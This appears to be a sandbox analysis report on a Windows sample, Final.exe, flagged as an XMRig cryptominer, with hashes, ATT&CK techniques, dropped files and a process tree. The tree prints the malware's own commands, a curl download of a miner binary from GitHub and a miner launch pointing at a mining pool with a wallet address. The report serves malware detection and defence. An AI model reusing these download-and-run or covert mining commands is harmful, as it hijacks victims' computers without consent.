xmrig | 3e0ae7a114a5707d81e9ef20289d41f69281038b8d8eb3c4f786b86507075eb7

Resubmissions

22/04/2024, 21:46

240422-1mlrysgg9w 10

22/04/2024, 21:45

240422-1mblzsgg9s 10

Analysis

max time kernel
143s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
22/04/2024, 21:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Final.exe
Size

12.5MB
MD5

3d30cc33bc230bd6d694f40c3bb825a8
SHA1

31edf37778986b26d33f65eae7e5b6b2a9a19024
SHA256

3e0ae7a114a5707d81e9ef20289d41f69281038b8d8eb3c4f786b86507075eb7
SHA512

5d2f5994ad20d7b342956efcdab718c1fc291b153a9b22d2ce511c4a2b8a828207ac70690698fa7d83a3273dd7404cafadc7f8c83ae8ab4f863184ed1cdc77fa
SSDEEP

393216:WludQdF3MnG3hFTuQmz2QwMCht9/Zy3A4YgyrDFhf:WludQ73MGxtuB2QxCh3xy3wRf

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/0x000b00000002342e-80.dat	family_xmrig
behavioral1/files/0x000b00000002342e-80.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	Final.exe

Executes dropped EXE 4 IoCs

pid	Process
4884	soundservice.exe
2204	soundservice.exe
1940	SoundDrive.exe
5096	SoundDrive.exe

Loads dropped DLL 14 IoCs

pid	Process
2644	Final.exe
2644	Final.exe
2644	Final.exe
2644	Final.exe
2644	Final.exe
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
35	raw.githubusercontent.com
36	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe
2204	soundservice.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2204	soundservice.exe
Token: SeLockMemoryPrivilege	1940	SoundDrive.exe
Token: SeLockMemoryPrivilege	5096	SoundDrive.exe
Token: SeLockMemoryPrivilege	1940	SoundDrive.exe
Token: SeLockMemoryPrivilege	5096	SoundDrive.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
5096	SoundDrive.exe
1940	SoundDrive.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3716 wrote to memory of 2644	3716	Final.exe	85
PID 3716 wrote to memory of 2644	3716	Final.exe	85
PID 2644 wrote to memory of 4884	2644	Final.exe	86
PID 2644 wrote to memory of 4884	2644	Final.exe	86
PID 4884 wrote to memory of 2204	4884	soundservice.exe	88
PID 4884 wrote to memory of 2204	4884	soundservice.exe	88
PID 2204 wrote to memory of 2920	2204	soundservice.exe	92
PID 2204 wrote to memory of 2920	2204	soundservice.exe	92
PID 2920 wrote to memory of 2364	2920	cmd.exe	94
PID 2920 wrote to memory of 2364	2920	cmd.exe	94
PID 2204 wrote to memory of 2716	2204	soundservice.exe	105
PID 2204 wrote to memory of 2716	2204	soundservice.exe	105
PID 2204 wrote to memory of 1788	2204	soundservice.exe	106
PID 2204 wrote to memory of 1788	2204	soundservice.exe	106
PID 1788 wrote to memory of 1940	1788	cmd.exe	109
PID 1788 wrote to memory of 1940	1788	cmd.exe	109
PID 2716 wrote to memory of 5096	2716	cmd.exe	110
PID 2716 wrote to memory of 5096	2716	cmd.exe	110

C:\Users\Admin\AppData\Local\Temp\Final.exe
"C:\Users\Admin\AppData\Local\Temp\Final.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3716
- C:\Users\Admin\AppData\Local\Temp\Final.exe
  "C:\Users\Admin\AppData\Local\Temp\Final.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Users\Admin\AppData\Local\Temp\_MEI37162\soundservice.exe
    "C:\Users\Admin\AppData\Local\Temp\_MEI37162\soundservice.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Users\Admin\AppData\Local\Temp\onefile_4884_133582959752271546\soundservice.exe
      "C:\Users\Admin\AppData\Local\Temp\_MEI37162\soundservice.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o SoundDrive.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2920
      - C:\Windows\system32\curl.exe
        
        curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o SoundDrive.exe
        6⤵
        
        PID:2364
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2716
      - C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5096
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1788
      - C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\psutil\_psutil_windows.pyd

Filesize
65KB

MD5
3cba71b6bc59c26518dc865241add80a

SHA1
7e9c609790b1de110328bbbcbb4cd09b7150e5bd

SHA256
e10b73d6e13a5ae2624630f3d8535c5091ef403db6a00a2798f30874938ee996

SHA512
3ef7e20e382d51d93c707be930e12781636433650d0a2c27e109ebebeba1f30ea3e7b09af985f87f67f6b9d2ac6a7a717435f94b9d1585a9eb093a83771b43f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe

Filesize
5.1MB

MD5
99aa369598e5d8eba59b7d0f0a8429f9

SHA1
7baaf6546112049038e4c62143ce7dd77c3a97c9

SHA256
8174ccc5cfae43503648608ba6ae14b00679517591a2cdff9017c4be2ab2996b

SHA512
3fdb8674033d6736bb548c262f54e1277c196fb83c3bfcc6dbe9b8bb126fb3f8404b6385f666b389e5ea84ab7261bcb65dddd88e39c53d3d0e6813dd9212c62f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\VCRUNTIME140_1.dll

Filesize
37KB

MD5
75e78e4bf561031d39f86143753400ff

SHA1
324c2a99e39f8992459495182677e91656a05206

SHA256
1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e

SHA512
ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\_bz2.pyd

Filesize
81KB

MD5
4101128e19134a4733028cfaafc2f3bb

SHA1
66c18b0406201c3cfbba6e239ab9ee3dbb3be07d

SHA256
5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80

SHA512
4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\_decimal.pyd

Filesize
245KB

MD5
d47e6acf09ead5774d5b471ab3ab96ff

SHA1
64ce9b5d5f07395935df95d4a0f06760319224a2

SHA256
d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e

SHA512
52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\_hashlib.pyd

Filesize
62KB

MD5
de4d104ea13b70c093b07219d2eff6cb

SHA1
83daf591c049f977879e5114c5fea9bbbfa0ad7b

SHA256
39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e

SHA512
567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\_lzma.pyd

Filesize
154KB

MD5
337b0e65a856568778e25660f77bc80a

SHA1
4d9e921feaee5fa70181eba99054ffa7b6c9bb3f

SHA256
613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a

SHA512
19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\_socket.pyd

Filesize
76KB

MD5
8140bdc5803a4893509f0e39b67158ce

SHA1
653cc1c82ba6240b0186623724aec3287e9bc232

SHA256
39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769

SHA512
d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\base_library.zip

Filesize
1.4MB

MD5
83d235e1f5b0ee5b0282b5ab7244f6c4

SHA1
629a1ce71314d7abbce96674a1ddf9f38c4a5e9c

SHA256
db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0

SHA512
77364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\libcrypto-1_1.dll

Filesize
3.3MB

MD5
6f4b8eb45a965372156086201207c81f

SHA1
8278f9539463f0a45009287f0516098cb7a15406

SHA256
976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

SHA512
2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\python311.dll

Filesize
5.5MB

MD5
9a24c8c35e4ac4b1597124c1dcbebe0f

SHA1
f59782a4923a30118b97e01a7f8db69b92d8382a

SHA256
a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7

SHA512
9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\pywin32_system32\pywintypes311.dll

Filesize
131KB

MD5
90b786dc6795d8ad0870e290349b5b52

SHA1
592c54e67cf5d2d884339e7a8d7a21e003e6482f

SHA256
89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a

SHA512
c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\select.pyd

Filesize
28KB

MD5
97ee623f1217a7b4b7de5769b7b665d6

SHA1
95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0

SHA256
0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790

SHA512
20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\soundservice.exe

Filesize
6.3MB

MD5
4f9ca5ab2e887ee687dff2ce85052bf6

SHA1
8d0a291413f890729af5ed58b9c597ee500f2da3

SHA256
9409baeb09064df416ec9c342623145667432ec358622e0dfe887eb4360e660a

SHA512
791dc4ff8b19494664ec93725984d97b140895cfda8c7567c6a86e1b9b9e7908ab175a4be0e1dc22389ceb58d2e02612b1e833e63ab4ab73ae0f2dcd494c7d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\unicodedata.pyd

Filesize
1.1MB

MD5
bc58eb17a9c2e48e97a12174818d969d

SHA1
11949ebc05d24ab39d86193b6b6fcff3e4733cfd

SHA256
ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa

SHA512
4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37162\win32\win32api.pyd

Filesize
130KB

MD5
1d6762b494dc9e60ca95f7238ae1fb14

SHA1
aa0397d96a0ed41b2f03352049dafe040d59ad5d

SHA256
fae5323e2119a8f678055f4244177b5806c7b6b171b1945168f685631b913664

SHA512
0b561f651161a34c37ff8d115f154c52202f573d049681f8cdd7bba2e966bb8203780c19ba824b4a693ef12ef1eeef6aeeef96eb369e4b6129f1deb6b26aaa00

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4884_133582959752271546\python3.dll

Filesize
64KB

MD5
34e49bb1dfddf6037f0001d9aefe7d61

SHA1
a25a39dca11cdc195c9ecd49e95657a3e4fe3215

SHA256
4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281

SHA512
edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4884_133582959752271546\soundservice.exe

Filesize
9.6MB

MD5
2754ffc05ccb17313935e7c5282f16ce

SHA1
e343a4a8a4895132c1ed77344fd96d5d05c948da

SHA256
3d8b729740addfd7f622b1ccc28b3539ed54824bbd9b71bf9b9695c7eb19d7ca

SHA512
99b75d34413d2ff78e8a369bed6182c586a3515075f5461b3c4d5c1e79f7860bd49fa00142fd83cba5ccf03c21db987361fb137be65187e46f4699cc6071201a

Download Submit
memory/1940-81-0x00000266AFD90000-0x00000266AFDB0000-memory.dmp

Filesize
128KB

Download
memory/1940-86-0x00000266AFDE0000-0x00000266AFE00000-memory.dmp

Filesize
128KB

Download
memory/1940-95-0x00000266AFE00000-0x00000266AFE20000-memory.dmp

Filesize
128KB

Download
memory/1940-101-0x00000266AFE00000-0x00000266AFE20000-memory.dmp

Filesize
128KB

Download
memory/2204-74-0x00007FF695E10000-0x00007FF6967B3000-memory.dmp

Filesize
9.6MB

Download
memory/2204-85-0x00007FF695E10000-0x00007FF6967B3000-memory.dmp

Filesize
9.6MB

Download
memory/4884-73-0x00007FF7FDD20000-0x00007FF7FE381000-memory.dmp

Filesize
6.4MB

Download
memory/5096-87-0x0000017F6DD00000-0x0000017F6DD20000-memory.dmp

Filesize
128KB

Download
memory/5096-94-0x0000017F6DD00000-0x0000017F6DD20000-memory.dmp

Filesize
128KB

Download